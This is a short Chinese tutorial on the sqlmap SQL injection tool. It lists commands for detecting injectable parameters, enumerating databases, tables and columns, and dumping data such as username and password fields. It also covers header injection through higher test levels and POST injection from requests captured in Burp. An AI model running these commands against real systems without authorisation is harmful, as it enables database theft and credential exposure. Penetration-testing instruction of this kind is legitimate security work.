sqlmap使用方法

判断是否能注入

  1. python sqlmap.py -u “url?id=1”

    找库

  2. python sqlmap.py -u “url?id=1” –dbs

找表

  1. python sqlmap.py -u “url?id=1” -D 库名 –tables

找列

  1. python sqlmap.py -u “url?id=1” -D 库名 -T 表名 –columns

dump掉信息

  1. python sqlmap.py -u “url?id=1” -D 库名 -T 表名 -C 列名 –dump
  2. 或者列名前加–columns

参考博客

  1. https://www.cnblogs.com/ichunqiu/p/5805108.html

嗅探等级:

不加level时默认为1,5级包含的payload最多,会自动破解出cookie和XFF等头部注入,相对应的速度也较慢

当不能确定哪个payload时或参数作为注入点,可以使用较高的level值

level 2

  1. http cookie测试

level 3

  1. http user-agent/referer头回测试

参考博客

  1. https://blog.csdn.net/a_small_rabbit/article/details/101110011

post注入

  1. 用burp抓包
  2. 将抓到的包保存为.txt文件类型(右击,copy to file)
  3. sqlmap中的命令:sqlmap -r “admin.txt” -p n –dbs(-r表示加载一个文件,-p指定参数)
  4. sqlmap -r “admin.txt” -p n -D 暴库名 –tables
  5. sqlmap -r “admin.txt” -p n -D 暴库名 -T 表名 –columns
  6. sqlmap -r “admin.txt” -p n -D 暴库名 -T 表名 -C “username,password” –dump

指定参数(get传参来实现post注入)

  1. sqlmap -u “url” –data “n=1&p=1” –dbs(与上面类似)
  2. sqlmap -u “url” –data “username=1&password=1” –dbs(假设参数是username和password)

-r指定文件去暴库

  1. python sqlmap.py -r 文件路径+文件名.txt –dbs

-forms

  1. 使用该命令,使sqlmap自己抓包
  2. sqlmap -u “url” –forms –level=5 –dbs